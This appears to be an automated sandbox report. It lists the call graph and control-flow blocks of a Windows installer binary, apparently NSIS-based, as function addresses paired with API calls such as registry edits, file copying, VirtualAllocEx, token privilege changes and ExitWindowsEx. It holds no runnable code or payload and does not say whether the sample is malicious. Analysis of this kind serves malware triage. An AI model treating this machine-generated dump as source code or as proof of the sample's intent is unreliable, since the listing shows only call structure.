5110->5104 5112 406596 WaitForSingleObject 5111->5112 5112->5109 5113->5100 5745 401ffb 5746 402bce 17 API calls 5745->5746 5747 402002 5746->5747 5748 406500 5 API calls 5747->5748 5749 402011 5748->5749 5750 402029 GlobalAlloc 5749->5750 5751 402091 5749->5751 5750->5751 5752 40203d 5750->5752 5753 406500 5 API calls 5752->5753 5754 402044 5753->5754 5755 406500 5 API calls 5754->5755 5756 40204e 5755->5756 5756->5751 5760 406055 wsprintfA 5756->5760 5758 402085 5761 406055 wsprintfA 5758->5761 5760->5758 5761->5751 5447 4018fd 5448 401934 5447->5448 5449 402bce 17 API calls 5448->5449 5450 401939 5449->5450 5451 4058bf 67 API calls 5450->5451 5452 401942 5451->5452 5183 401000 5184 401037 BeginPaint GetClientRect 5183->5184 5185 40100c DefWindowProcA 5183->5185 5187 4010f3 5184->5187 5188 401179 5185->5188 5189 401073 CreateBrushIndirect FillRect DeleteObject 5187->5189 5190 4010fc 5187->5190 5189->5187 5191 401102 CreateFontIndirectA 5190->5191 5192 401167 EndPaint 5190->5192 5191->5192 5193 401112 6 API calls 5191->5193 5192->5188 5193->5192 5689 401900 5690 402bce 17 API calls 5689->5690 5691 401907 5690->5691 5692 405813 MessageBoxIndirectA 5691->5692 5693 401910 5692->5693 5762 404b80 GetDlgItem GetDlgItem 5763 404bd6 7 API calls 5762->5763 5771 404dfd 5762->5771 5764 404c72 SendMessageA 5763->5764 5765 404c7e DeleteObject 5763->5765 5764->5765 5766 404c89 5765->5766 5767 404cc0 5766->5767 5772 40618a 17 API calls 5766->5772 5769 40417b 18 API calls 5767->5769 5768 404edf 5770 404f8b 5768->5770 5774 404df0 5768->5774 5780 404f38 SendMessageA 5768->5780 5773 404cd4 5769->5773 5775 404f95 SendMessageA 5770->5775 5776 404f9d 5770->5776 5771->5768 5792 404e6c 5771->5792 5816 404ace SendMessageA 5771->5816 5777 404ca2 SendMessageA SendMessageA 5772->5777 5779 40417b 18 API calls 5773->5779 5782 4041e2 8 API calls 5774->5782 5775->5776 5784 404fb6 5776->5784 5785 404faf ImageList_Destroy 5776->5785 5793 404fc6 5776->5793 5777->5766 5797 404ce5 5779->5797 5780->5774 5787 404f4d SendMessageA 5780->5787 5781 404ed1 SendMessageA 5781->5768 5783 40518b 5782->5783 5788 404fbf GlobalFree 5784->5788 5784->5793 5785->5784 5786 40513f 5786->5774 5794 405151 ShowWindow GetDlgItem ShowWindow 5786->5794 5790 404f60 5787->5790 5788->5793 5789 404dbf GetWindowLongA SetWindowLongA 5791 404dd8 5789->5791 5801 404f71 SendMessageA 5790->5801 5795 404df5 5791->5795 5796 404ddd ShowWindow 5791->5796 5792->5768 5792->5781 5793->5786 5808 405001 5793->5808 5821 404b4e 5793->5821 5794->5774 5815 4041b0 SendMessageA 5795->5815 5814 4041b0 SendMessageA 5796->5814 5797->5789 5800 404d37 SendMessageA 5797->5800 5802 404dba 5797->5802 5803 404d75 SendMessageA 5797->5803 5804 404d89 SendMessageA 5797->5804 5800->5797 5801->5770 5802->5789 5802->5791 5803->5797 5804->5797 5806 40510b 5807 405115 InvalidateRect 5806->5807 5810 405121 5806->5810 5807->5810 5809 40502f SendMessageA 5808->5809 5812 405045 5808->5812 5809->5812 5810->5786 5813 404a89 20 API calls 5810->5813 5811 4050b9 SendMessageA SendMessageA 5811->5812 5812->5806 5812->5811 5813->5786 5814->5774 5815->5771 5817 404af1 GetMessagePos ScreenToClient SendMessageA 5816->5817 5818 404b2d SendMessageA 5816->5818 5819 404b25 5817->5819 5820 404b2a 5817->5820 5818->5819 5819->5792 5820->5818 5830 4060f7 lstrcpynA 5821->5830 5823 404b61 5831 406055 wsprintfA 5823->5831 5825 404b6b 5826 40140b 2 API calls 5825->5826 5827 404b74 5826->5827 5832 4060f7 lstrcpynA 5827->5832 5829 404b7b 5829->5808 5830->5823 5831->5825 5832->5829 5694 401502 5695 40150a 5694->5695 5697 40151d 5694->5697 5696 402bac 17 API calls 5695->5696 5696->5697 5194 402604 5195 402bce 17 API calls 5194->5195 5196 40260b 5195->5196 5199 405c90 GetFileAttributesA CreateFileA 5196->5199 5198 402617 5199->5198 5833 401b87 5834 401bd8 5833->5834 5839 401b94 5833->5839 5835 401c01 GlobalAlloc 5834->5835 5836 401bdc 5834->5836 5837 40618a 17 API calls 5835->5837 5846 402387 5836->5846 5854 4060f7 lstrcpynA 5836->5854 5840 401c1c 5837->5840 5838 40618a 17 API calls 5841 402381 5838->5841 5839->5840 5842 401bab 5839->5842 5840->5838 5840->5846 5841->5846 5848 405813 MessageBoxIndirectA 5841->5848 5852 4060f7 lstrcpynA 5842->5852 5845 401bee GlobalFree 5845->5846 5847 401bba 5853 4060f7 lstrcpynA 5847->5853 5848->5846 5850 401bc9 5855 4060f7 lstrcpynA 5850->5855 5852->5847 5853->5850 5854->5845 5855->5846 4636 402588 4648 402c0e 4636->4648 4639 402bac 17 API calls 4640 40259b 4639->4640 4641 4025a9 4640->4641 4646 4027bf 4640->4646 4642 4025c2 RegEnumValueA 4641->4642 4643 4025b6 RegEnumKeyA 4641->4643 4644 4025de RegCloseKey 4642->4644 4645 4025d7 4642->4645 4643->4644 4644->4646 4645->4644 4649 402bce 17 API calls 4648->4649 4650 402c25 4649->4650 4651 405f7d RegOpenKeyExA 4650->4651 4652 402592 4651->4652 4652->4639 4653 401389 4654 401390 4653->4654 4655 4013fe 4654->4655 4656 4013cb MulDiv SendMessageA 4654->4656 4656->4654 5856 742f2be3 5857 742f2bfb 5856->5857 5858 742f1534 2 API calls 5857->5858 5859 742f2c16 5858->5859 5200 40460d 5201 404639 5200->5201 5202 40464a 5200->5202 5261 4057f7 GetDlgItemTextA 5201->5261 5204 404656 GetDlgItem 5202->5204 5209 4046b5 5202->5209 5207 40466a 5204->5207 5205 404799 5259 404943 5205->5259 5266 4057f7 GetDlgItemTextA 5205->5266 5206 404644 5208 4063d2 5 API calls 5206->5208 5211 40467e SetWindowTextA 5207->5211 5212 405b28 4 API calls 5207->5212 5208->5202 5209->5205 5213 40618a 17 API calls 5209->5213 5209->5259 5262 40417b 5211->5262 5217 404674 5212->5217 5218 404729 SHBrowseForFolderA 5213->5218 5214 4047c9 5219 405b7d 18 API calls 5214->5219 5217->5211 5225 405a8f 3 API calls 5217->5225 5218->5205 5222 404741 CoTaskMemFree 5218->5222 5223 4047cf 5219->5223 5220 40469a 5224 40417b 18 API calls 5220->5224 5226 405a8f 3 API calls 5222->5226 5267 4060f7 lstrcpynA 5223->5267 5227 4046a8 5224->5227 5225->5211 5228 40474e 5226->5228 5265 4041b0 SendMessageA 5227->5265 5231 404785 SetDlgItemTextA 5228->5231 5236 40618a 17 API calls 5228->5236 5231->5205 5232 4046ae 5234 406500 5 API calls 5232->5234 5233 4047e6 5235 406500 5 API calls 5233->5235 5234->5209 5247 4047ed 5235->5247 5237 40476d lstrcmpiA 5236->5237 5237->5231 5240 40477e lstrcatA 5237->5240 5238 404829 5268 4060f7 lstrcpynA 5238->5268 5240->5231 5241 404830 5242 405b28 4 API calls 5241->5242 5243 404836 GetDiskFreeSpaceA 5242->5243 5246 40485a MulDiv 5243->5246 5248 404881 5243->5248 5245 405ad6 2 API calls 5245->5247 5246->5248 5247->5238 5247->5245 5247->5248 5249 4048f2 5248->5249 5269 404a89 5248->5269 5250 404915 5249->5250 5252 40140b 2 API calls 5249->5252 5280 40419d EnableWindow 5250->5280 5252->5250 5255 4048f4 SetDlgItemTextA 5255->5249 5256 4048e4 5272 4049c4 5256->5272 5257 404931 5257->5259 5281 404566 5257->5281 5284 4041e2 5259->5284 5261->5206 5263 40618a 17 API calls 5262->5263 5264 404186 SetDlgItemTextA 5263->5264 5264->5220 5265->5232 5266->5214 5267->5233 5268->5241 5270 4049c4 20 API calls 5269->5270 5271 4048df 5270->5271 5271->5255 5271->5256 5273 4049da 5272->5273 5274 40618a 17 API calls 5273->5274 5275 404a3e 5274->5275 5276 40618a 17 API calls 5275->5276 5277 404a49 5276->5277 5278 40618a 17 API calls 5277->5278 5279 404a5f lstrlenA wsprintfA SetDlgItemTextA 5278->5279 5279->5249 5280->5257 5282 404574 5281->5282 5283 404579 SendMessageA 5281->5283 5282->5283 5283->5259 5285 4041fa GetWindowLongA 5284->5285 5286 4042a5 5284->5286 5285->5286 5287 40420f 5285->5287 5287->5286 5288 40423c GetSysColor 5287->5288 5289 40423f 5287->5289 5288->5289 5290 404245 SetTextColor 5289->5290 5291 40424f SetBkMode 5289->5291 5290->5291 5292 404267 GetSysColor 5291->5292 5293 40426d 5291->5293 5292->5293 5294 404274 SetBkColor 5293->5294 5295 40427e 5293->5295 5294->5295 5295->5286 5296 404291 DeleteObject 5295->5296 5297 404298 CreateBrushIndirect 5295->5297 5296->5297 5297->5286 5298 40280f 5320 405c90 GetFileAttributesA CreateFileA 5298->5320 5300 402816 5301 402822 GlobalAlloc 5300->5301 5302 4028bf 5300->5302 5303 4028b6 CloseHandle 5301->5303 5304 40283b 5301->5304 5305 4028c7 DeleteFileA 5302->5305 5306 4028da 5302->5306 5303->5302 5321 403300 SetFilePointer 5304->5321 5305->5306 5308 402841 5309 4032ea ReadFile 5308->5309 5310 40284a GlobalAlloc 5309->5310 5311 402894 5310->5311 5312 40285a 5310->5312 5313 405d37 WriteFile 5311->5313 5314 4030d8 31 API calls 5312->5314 5315 4028a0 GlobalFree 5313->5315 5319 402867 5314->5319 5316 4030d8 31 API calls 5315->5316 5318 4028b3 5316->5318 5317 40288b GlobalFree 5317->5311 5318->5303 5319->5317 5320->5300 5321->5308 5453 742f10e0 5454 742f110e 5453->5454 5455 742f11c4 GlobalFree 5454->5455 5456 742f12ad 2 API calls 5454->5456 5457 742f11c3 5454->5457 5458 742f1155 GlobalAlloc 5454->5458 5459 742f11ea GlobalFree 5454->5459 5460 742f1266 2 API calls 5454->5460 5461 742f11b1 GlobalFree 5454->5461 5462 742f12d1 lstrcpyA 5454->5462 5456->5454 5457->5455 5458->5454 5459->5454 5460->5461 5461->5454 5462->5454 5463 401490 5464 40521e 24 API calls 5463->5464 5465 401497 5464->5465 5860 405192 5861 4051a2 5860->5861 5862 4051b6 5860->5862 5863 4051ff 5861->5863 5864 4051a8 5861->5864 5865 4051be IsWindowVisible 5862->5865 5871 4051d5 5862->5871 5866 405204 CallWindowProcA 5863->5866 5867 4041c7 SendMessageA 5864->5867 5865->5863 5868 4051cb 5865->5868 5869 4051b2 5866->5869 5867->5869 5870 404ace 5 API calls 5868->5870 5870->5871 5871->5866 5872 404b4e 4 API calls 5871->5872 5872->5863 4665 402516 4666 402c0e 17 API calls 4665->4666 4667 402520 4666->4667 4668 402bce 17 API calls 4667->4668 4669 402529 4668->4669 4670 402533 RegQueryValueExA 4669->4670 4671 4027bf 4669->4671 4672 402553 4670->4672 4675 402559 RegCloseKey 4670->4675 4672->4675 4676 406055 wsprintfA 4672->4676 4675->4671 4676->4675 4719 40239c 4720 4023a4 4719->4720 4721 4023aa 4719->4721 4722 402bce 17 API calls 4720->4722 4723 4023ba 4721->4723 4724 402bce 17 API calls 4721->4724 4722->4721 4725 4023c8 4723->4725 4726 402bce 17 API calls 4723->4726 4724->4723 4727 402bce 17 API calls 4725->4727 4726->4725 4728 4023d1 WritePrivateProfileStringA 4727->4728 4729 40209d 4730 40215d 4729->4730 4731 4020af 4729->4731 4733 401423 24 API calls 4730->4733 4732 402bce 17 API calls 4731->4732 4734 4020b6 4732->4734 4740 4022e2 4733->4740 4735 402bce 17 API calls 4734->4735 4736 4020bf 4735->4736 4737 4020d4 LoadLibraryExA 4736->4737 4738 4020c7 GetModuleHandleA 4736->4738 4737->4730 4739 4020e4 GetProcAddress 4737->4739 4738->4737 4738->4739 4741 402130 4739->4741 4742 4020f3 4739->4742 4745 40521e 24 API calls 4741->4745 4743 402112 4742->4743 4744 4020fb 4742->4744 4750 742f16db 4743->4750 4792 401423 4744->4792 4747 402103 4745->4747 4747->4740 4748 402151 FreeLibrary 4747->4748 4748->4740 4751 742f170b 4750->4751 4795 742f1a98 4751->4795 4753 742f1712 4754 742f1834 4753->4754 4755 742f172a 4753->4755 4756 742f1723 4753->4756 4754->4747 4829 742f22f1 4755->4829 4846 742f22af 4756->4846 4761 742f178e 4767 742f17dc 4761->4767 4768 742f1794 4761->4768 4762 742f1770 4859 742f24d8 4762->4859 4763 742f1759 4777 742f174f 4763->4777 4856 742f2cc3 4763->4856 4764 742f1740 4766 742f1746 4764->4766 4772 742f1751 4764->4772 4766->4777 4840 742f2a38 4766->4840 4770 742f24d8 11 API calls 4767->4770 4878 742f156b 4768->4878 4775 742f17cd 4770->4775 4771 742f1776 4870 742f1559 4771->4870 4850 742f26b2 4772->4850 4791 742f1823 4775->4791 4884 742f249e 4775->4884 4777->4761 4777->4762 4781 742f1757 4781->4777 4782 742f24d8 11 API calls 4782->4775 4784 742f182d GlobalFree 4784->4754 4788 742f180f 4788->4791 4888 742f14e2 wsprintfA 4788->4888 4789 742f1808 FreeLibrary 4789->4788 4791->4754 4791->4784 4793 40521e 24 API calls 4792->4793 4794 401431 4793->4794 4794->4747 4891 742f1215 GlobalAlloc 4795->4891 4797 742f1abf 4892 742f1215 GlobalAlloc 4797->4892 4799 742f1d00 GlobalFree GlobalFree GlobalFree 4800 742f1d1d 4799->4800 4813 742f1d67 4799->4813 4802 742f20f1 4800->4802 4808 742f1d32 4800->4808 4800->4813 4801 742f1bbd GlobalAlloc 4819 742f1aca 4801->4819 4803 742f2113 GetModuleHandleA 4802->4803 4802->4813 4804 742f2139 4803->4804 4805 742f2124 LoadLibraryA 4803->4805 4899 742f15c2 GetProcAddress 4804->4899 4805->4804 4805->4813 4806 742f1c08 lstrcpyA 4810 742f1c12 lstrcpyA 4806->4810 4807 742f1c26 GlobalFree 4807->4819 4808->4813 4895 742f1224 4808->4895 4810->4819 4811 742f218a 4811->4813 4816 742f2197 lstrlenA 4811->4816 4812 742f1fb7 4898 742f1215 GlobalAlloc 4812->4898 4813->4753 4900 742f15c2 GetProcAddress 4816->4900 4817 742f214b 4817->4811 4827 742f2174 GetProcAddress 4817->4827 4819->4799 4819->4801 4819->4806 4819->4807 4819->4810 4819->4812 4819->4813 4820 742f1ef9 GlobalFree 4819->4820 4821 742f2033 4819->4821 4822 742f1c64 4819->4822 4824 742f1224 2 API calls 4819->4824 4820->4819 4821->4813 4826 742f208c lstrcpyA 4821->4826 4822->4819 4893 742f1534 GlobalSize GlobalAlloc 4822->4893 4823 742f21b0 4823->4813 4824->4819 4826->4813 4827->4811 4828 742f1fbf 4828->4753 4837 742f230a 4829->4837 4830 742f1224 GlobalAlloc lstrcpynA 4830->4837 4832 742f2446 GlobalFree 4833 742f1730 4832->4833 4832->4837 4833->4763 4833->4764 4833->4777 4834 742f23b8 GlobalAlloc MultiByteToWideChar 4835 742f2405 4834->4835 4836 742f23e4 GlobalAlloc 4834->4836 4835->4832 4906 742f2646 4835->4906 4838 742f23fc GlobalFree 4836->4838 4837->4830 4837->4832 4837->4834 4837->4835 4902 742f12ad 4837->4902 4838->4832 4842 742f2a4a 4840->4842 4841 742f2aef VirtualAllocEx 4845 742f2b0d 4841->4845 4842->4841 4844 742f2bd9 4844->4777 4909 742f29e4 4845->4909 4847 742f22c4 4846->4847 4848 742f22cf GlobalAlloc 4847->4848 4849 742f1729 4847->4849 4848->4847 4849->4755 4854 742f26e2 4850->4854 4851 742f277d GlobalAlloc 4855 742f27a0 4851->4855 4852 742f2790 4853 742f2796 GlobalSize 4852->4853 4852->4855 4853->4855 4854->4851 4854->4852 4855->4781 4857 742f2cce 4856->4857 4858 742f2d0e GlobalFree 4857->4858 4913 742f1215 GlobalAlloc 4859->4913 4861 742f2598 WideCharToMultiByte 4866 742f24e4 4861->4866 4862 742f2574 StringFromGUID2 WideCharToMultiByte 4862->4866 4863 742f2563 lstrcpynA 4863->4866 4864 742f25b9 wsprintfA 4864->4866 4865 742f25dd GlobalFree 4865->4866 4866->4861 4866->4862 4866->4863 4866->4864 4866->4865 4867 742f2617 GlobalFree 4866->4867 4868 742f1266 2 API calls 4866->4868 4914 742f12d1 4866->4914 4867->4771 4868->4866 4918 742f1215 GlobalAlloc 4870->4918 4872 742f155e 4873 742f156b 2 API calls 4872->4873 4874 742f1568 4873->4874 4875 742f1266 4874->4875 4876 742f126f GlobalAlloc lstrcpynA 4875->4876 4877 742f12a8 GlobalFree 4875->4877 4876->4877 4877->4775 4879 742f1577 wsprintfA 4878->4879 4880 742f15a4 lstrcpyA 4878->4880 4883 742f15bd 4879->4883 4880->4883 4883->4782 4885 742f24ac 4884->4885 4886 742f17ef 4884->4886 4885->4886 4887 742f24c5 GlobalFree 4885->4887 4886->4788 4886->4789 4887->4885 4889 742f1266 2 API calls 4888->4889 4890 742f1503 4889->4890 4890->4791 4891->4797 4892->4819 4894 742f1552 4893->4894 4894->4822 4901 742f1215 GlobalAlloc 4895->4901 4897 742f1233 lstrcpynA 4897->4813 4898->4828 4899->4817 4900->4823 4901->4897 4903 742f12b4 4902->4903 4904 742f1224 2 API calls 4903->4904 4905 742f12cf 4904->4905 4905->4837 4907 742f26aa 4906->4907 4908 742f2654 VirtualAlloc 4906->4908 4907->4835 4908->4907 4910 742f29ef 4909->4910 4911 742f29f4 GetLastError 4910->4911 4912 742f29ff 4910->4912 4911->4912 4912->4844 4913->4866 4915 742f12da 4914->4915 4916 742f12f9 4914->4916 4915->4916 4917 742f12e0 lstrcpyA 4915->4917 4916->4866 4917->4916 4918->4872 4919 40159d 4920 402bce 17 API calls 4919->4920 4921 4015a4 SetFileAttributesA 4920->4921 4922 4015b6 4921->4922 5466 40149d 5467 402387 5466->5467 5468 4014ab PostQuitMessage 5466->5468 5468->5467 4923 401a1e 4924 402bce 17 API calls 4923->4924 4925 401a27 ExpandEnvironmentStringsA 4924->4925 4926 401a3b 4925->4926 4928 401a4e 4925->4928 4927 401a40 lstrcmpA 4926->4927 4926->4928 4927->4928 4929 40171f 4930 402bce 17 API calls 4929->4930 4931 401726 SearchPathA 4930->4931 4932 401741 4931->4932 5698 401d1f 5699 402bac 17 API calls 5698->5699 5700 401d26 5699->5700 5701 402bac 17 API calls 5700->5701 5702 401d32 GetDlgItem 5701->5702 5703 402620 5702->5703 4940 402421 4941 402453 4940->4941 4942 402428 4940->4942 4943 402bce 17 API calls 4941->4943 4944 402c0e 17 API calls 4942->4944 4945 40245a 4943->4945 4946 40242f 4944->4946 4952 402c8c 4945->4952 4948 402439 4946->4948 4949 402467 4946->4949 4950 402bce 17 API calls 4948->4950 4951 402440 RegDeleteValueA RegCloseKey 4950->4951 4951->4949 4953 402c98 4952->4953 4954 402c9f 4952->4954 4953->4949 4954->4953 4956 402cd0 4954->4956 4957 405f7d RegOpenKeyExA 4956->4957 4958 402cfe 4957->4958 4959 402db3 4958->4959 4960 402d08 4958->4960 4959->4953 4961 402d0e RegEnumValueA 4960->4961 4965 402d31 4960->4965 4962 402d98 RegCloseKey 4961->4962 4961->4965 4962->4959 4963 402d6d RegEnumKeyA 4964 402d76 RegCloseKey 4963->4964 4963->4965 4966 406500 5 API calls 4964->4966 4965->4962 4965->4963 4965->4964 4967 402cd0 6 API calls 4965->4967 4968 402d86 4966->4968 4967->4965 4969 402da8 4968->4969 4970 402d8a RegDeleteKeyA 4968->4970 4969->4959 4970->4959 4971 4027a1 4972 402bce 17 API calls 4971->4972 4973 4027a8 FindFirstFileA 4972->4973 4974 4027cb 4973->4974 4975 4027bb 4973->4975 4976 4027d2 4974->4976 4979 406055 wsprintfA 4974->4979 4980 4060f7 lstrcpynA 4976->4980 4979->4976 4980->4975 5322 402626 5323 40262b 5322->5323 5324 40263f 5322->5324 5325 402bac 17 API calls 5323->5325 5326 402bce 17 API calls 5324->5326 5328 402634 5325->5328 5327 402646 lstrlenA 5326->5327 5327->5328 5329 405d37 WriteFile 5328->5329 5330 402668 5328->5330 5329->5330 5474 403ca7 5475 403dfa 5474->5475 5476 403cbf 5474->5476 5478 403e4b 5475->5478 5479 403e0b GetDlgItem GetDlgItem 5475->5479 5476->5475 5477 403ccb 5476->5477 5481 403cd6 SetWindowPos 5477->5481 5482 403ce9 5477->5482 5480 403ea5 5478->5480 5488 401389 2 API calls 5478->5488 5483 40417b 18 API calls 5479->5483 5484 4041c7 SendMessageA 5480->5484 5534 403df5 5480->5534 5481->5482 5485 403d06 5482->5485 5486 403cee ShowWindow 5482->5486 5487 403e35 SetClassLongA 5483->5487 5532 403eb7 5484->5532 5489 403d28 5485->5489 5490 403d0e DestroyWindow 5485->5490 5486->5485 5491 40140b 2 API calls 5487->5491 5494 403e7d 5488->5494 5492 403d2d SetWindowLongA 5489->5492 5493 403d3e 5489->5493 5542 404104 5490->5542 5491->5478 5492->5534 5495 403d4a GetDlgItem 5493->5495 5509 403db5 5493->5509 5494->5480 5496 403e81 SendMessageA 5494->5496 5499 403d5d SendMessageA IsWindowEnabled 5495->5499 5503 403d7a 5495->5503 5496->5534 5497 40140b 2 API calls 5497->5532 5498 404106 DestroyWindow EndDialog 5498->5542 5499->5503 5499->5534 5500 4041e2 8 API calls 5500->5534 5501 404135 ShowWindow 5501->5534 5502 40618a 17 API calls 5502->5532 5504 403d87 5503->5504 5507 403dce SendMessageA 5503->5507 5508 403d9a 5503->5508 5514 403d7f 5503->5514 5504->5507 5504->5514 5506 40417b 18 API calls 5506->5532 5507->5509 5510 403da2 5508->5510 5511 403db7 5508->5511 5509->5500 5513 40140b 2 API calls 5510->5513 5512 40140b 2 API calls 5511->5512 5512->5514 5513->5514 5514->5509 5543 404154 5514->5543 5515 40417b 18 API calls 5516 403f32 GetDlgItem 5515->5516 5517 403f47 5516->5517 5518 403f4f ShowWindow EnableWindow 5516->5518 5517->5518 5546 40419d EnableWindow 5518->5546 5520 403f79 EnableWindow 5525 403f8d 5520->5525 5521 403f92 GetSystemMenu EnableMenuItem SendMessageA 5522 403fc2 SendMessageA 5521->5522 5521->5525 5522->5525 5524 403c88 18 API calls 5524->5525 5525->5521 5525->5524 5547 4041b0 SendMessageA 5525->5547 5548 4060f7 lstrcpynA 5525->5548 5527 403ff1 lstrlenA 5528 40618a 17 API calls 5527->5528 5529 404002 SetWindowTextA 5528->5529 5530 401389 2 API calls 5529->5530 5530->5532 5531 404046 DestroyWindow 5533 404060 CreateDialogParamA 5531->5533 5531->5542 5532->5497 5532->5498 5532->5502 5532->5506 5532->5515 5532->5531 5532->5534 5535 404093 5533->5535 5533->5542 5536 40417b 18 API calls 5535->5536 5537 40409e GetDlgItem GetWindowRect ScreenToClient SetWindowPos 5536->5537 5538 401389 2 API calls 5537->5538 5539 4040e4 5538->5539 5539->5534 5540 4040ec ShowWindow 5539->5540 5541 4041c7 SendMessageA 5540->5541 5541->5542 5542->5501 5542->5534 5544 404161 SendMessageA 5543->5544 5545 40415b 5543->5545 5544->5509 5545->5544 5546->5520 5547->5525 5548->5527 5013 40272b 5014 402732 5013->5014 5016 4029aa 5013->5016 5015 402bac 17 API calls 5014->5015 5017 402739 5015->5017 5018 402748 SetFilePointer 5017->5018 5018->5016 5019 402758 5018->5019 5021 406055 wsprintfA 5019->5021 5021->5016 5032 401c2e 5033 402bac 17 API calls 5032->5033 5034 401c35 5033->5034 5035 402bac 17 API calls 5034->5035 5036 401c42 5035->5036 5037 401c57 5036->5037 5038 402bce 17 API calls 5036->5038 5039 401c67 5037->5039 5040 402bce 17 API calls 5037->5040 5038->5037 5041 401c72 5039->5041 5042 401cbe 5039->5042 5040->5039 5044 402bac 17 API calls 5041->5044 5043 402bce 17 API calls 5042->5043 5046 401cc3 5043->5046 5045 401c77 5044->5045 5047 402bac 17 API calls 5045->5047 5048 402bce 17 API calls 5046->5048 5049 401c83 5047->5049 5050 401ccc FindWindowExA 5048->5050 5051 401c90 SendMessageTimeoutA 5049->5051 5052 401cae SendMessageA 5049->5052 5053 401cea 5050->5053 5051->5053 5052->5053 5549 4042b1 lstrcpynA lstrlenA 5060 401e35 GetDC 5061 402bac 17 API calls 5060->5061 5062 401e47 GetDeviceCaps MulDiv ReleaseDC 5061->5062 5063 402bac 17 API calls 5062->5063 5064 401e78 5063->5064 5065 40618a 17 API calls 5064->5065 5066 401eb5 CreateFontIndirectA 5065->5066 5067 402620 5066->5067 5331 402a35 SendMessageA 5332 402a5a 5331->5332 5333 402a4f InvalidateRect 5331->5333 5333->5332 5334 742f225a 5335 742f22c4 5334->5335 5336 742f22cf GlobalAlloc 5335->5336 5337 742f22ee 5335->5337 5336->5335 5338 742f1058 5340 742f1074 5338->5340 5339 742f10dc 5340->5339 5341 742f14bb GlobalFree 5340->5341 5342 742f1091 5340->5342 5341->5342 5343 742f14bb GlobalFree 5342->5343 5344 742f10a1 5343->5344 5345 742f10a8 GlobalSize 5344->5345 5346 742f10b1 5344->5346 5345->5346 5347 742f10b5 GlobalAlloc 5346->5347 5348 742f10c6 5346->5348 5349 742f14e2 3 API calls 5347->5349 5350 742f10d1 GlobalFree 5348->5350 5349->5348 5350->5339 5550 4014b7 5551 4014bd 5550->5551 5552 401389 2 API calls 5551->5552 5553 4014c5 5552->5553 5873 402dba 5874 402de2 5873->5874 5875 402dc9 SetTimer 5873->5875 5876 402e37 5874->5876 5877 402dfc MulDiv wsprintfA SetWindowTextA SetDlgItemTextA 5874->5877 5875->5874 5877->5876 5114 4015bb 5115 402bce 17 API calls 5114->5115 5116 4015c2 5115->5116 5117 405b28 4 API calls 5116->5117 5122 4015ca 5117->5122 5118 401624 5120 401652 5118->5120 5121 401629 5118->5121 5119 405aba CharNextA 5119->5122 5125 401423 24 API calls 5120->5125 5123 401423 24 API calls 5121->5123 5122->5118 5122->5119 5128 405761 2 API calls 5122->5128 5129 40577e 5 API calls 5122->5129 5131 40160c GetFileAttributesA 5122->5131 5132 4056e4 4 API calls 5122->5132 5124 401630 5123->5124 5133 4060f7 lstrcpynA 5124->5133 5127 40164a 5125->5127 5128->5122 5129->5122 5130 40163b SetCurrentDirectoryA 5130->5127 5131->5122 5132->5122 5133->5130 5554 4016bb 5555 402bce 17 API calls 5554->5555 5556 4016c1 GetFullPathNameA 5555->5556 5557 4016d8 5556->5557 5563 4016f9 5556->5563 5560 40646b 2 API calls 5557->5560 5557->5563 5558 402a5a 5559 40170d GetShortPathNameA 5559->5558 5561 4016e9 5560->5561 5561->5563 5564 4060f7 lstrcpynA 5561->5564 5563->5558 5563->5559 5564->5563 5878 742f15d1 5879 742f14bb GlobalFree 5878->5879 5881 742f15e9 5879->5881 5880 742f162f GlobalFree 5881->5880 5882 742f1604 5881->5882 5883 742f161b VirtualFree 5881->5883 5882->5880 5883->5880

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 0 403348-403387 SetErrorMode GetVersion 1 403389-403391 call 406500 0->1 2 40339a 0->2 1->2 7 403393 1->7 4 40339f-4033b2 call 406492 lstrlenA 2->4 9 4033b4-4033d0 call 406500 * 3 4->9 7->2 16 4033e1-40343f #17 OleInitialize SHGetFileInfoA call 4060f7 GetCommandLineA call 4060f7 9->16 17 4033d2-4033d8 9->17 24 403441-403446 16->24 25 40344b-403460 call 405aba CharNextA 16->25 17->16 21 4033da 17->21 21->16 24->25 28 403525-403529 25->28 29 403465-403468 28->29 30 40352f 28->30 31 403470-403478 29->31 32 40346a-40346e 29->32 33 403542-40355c GetTempPathA call 403317 30->33 34 403480-403483 31->34 35 40347a-40347b 31->35 32->31 32->32 42 4035b4-4035ce DeleteFileA call 402ea1 33->42 43 40355e-40357c GetWindowsDirectoryA lstrcatA call 403317 33->43 37 403515-403522 call 405aba 34->37 38 403489-40348d 34->38 35->34 37->28 53 403524 37->53 40 4034a5-4034d2 38->40 41 40348f-403495 38->41 49 4034d4-4034da 40->49 50 4034e5-403513 40->50 47 403497-403499 41->47 48 40349b 41->48 58 403662-403672 call 403830 OleUninitialize 42->58 59 4035d4-4035da 42->59 43->42 61 40357e-4035ae GetTempPathA lstrcatA SetEnvironmentVariableA * 2 call 403317 43->61 47->40 47->48 48->40 54 4034e0 49->54 55 4034dc-4034de 49->55 50->37 57 403531-40353d call 4060f7 50->57 53->28 54->50 55->50 55->54 57->33 72 403796-40379c 58->72 73 403678-403688 call 405813 ExitProcess 58->73 62 403652-403659 call 40390a 59->62 63 4035dc-4035e7 call 405aba 59->63 61->42 61->58 70 40365e 62->70 74 4035e9-403612 63->74 75 40361d-403627 63->75 70->58 77 403818-403820 72->77 78 40379e-4037b7 GetCurrentProcess OpenProcessToken 72->78 79 403614-403616 74->79 82 403629-403636 call 405b7d 75->82 83 40368e-4036a2 call 40577e lstrcatA 75->83 80 403822 77->80 81 403826-40382a ExitProcess 77->81 85 4037e9-4037f7 call 406500 78->85 86 4037b9-4037e3 LookupPrivilegeValueA AdjustTokenPrivileges 78->86 79->75 88 403618-40361b 79->88 80->81 82->58 96 403638-40364e call 4060f7 * 2 82->96 97 4036a4-4036aa lstrcatA 83->97 98 4036af-4036c9 lstrcatA lstrcmpiA 83->98 94 403805-40380f ExitWindowsEx 85->94 95 4037f9-403803 85->95 86->85 88->75 88->79 94->77 100 403811-403813 call 40140b 94->100 95->94 95->100 96->62 97->98 98->58 99 4036cb-4036ce 98->99 102 4036d0-4036d5 call 4056e4 99->102 103 4036d7 call 405761 99->103 100->77 112 4036dc-4036e9 SetCurrentDirectoryA 102->112 103->112 113 4036f6-40371e call 4060f7 112->113 114 4036eb-4036f1 call 4060f7 112->114 118 403724-403740 call 40618a DeleteFileA 113->118 114->113 121 403781-403788 118->121 122 403742-403752 CopyFileA 118->122 121->118 124 40378a-403791 call 405ed6 121->124 122->121 123 403754-403774 call 405ed6 call 40618a call 405796 122->123 123->121 133 403776-40377d CloseHandle 123->133 124->58 133->121
                                                              APIs
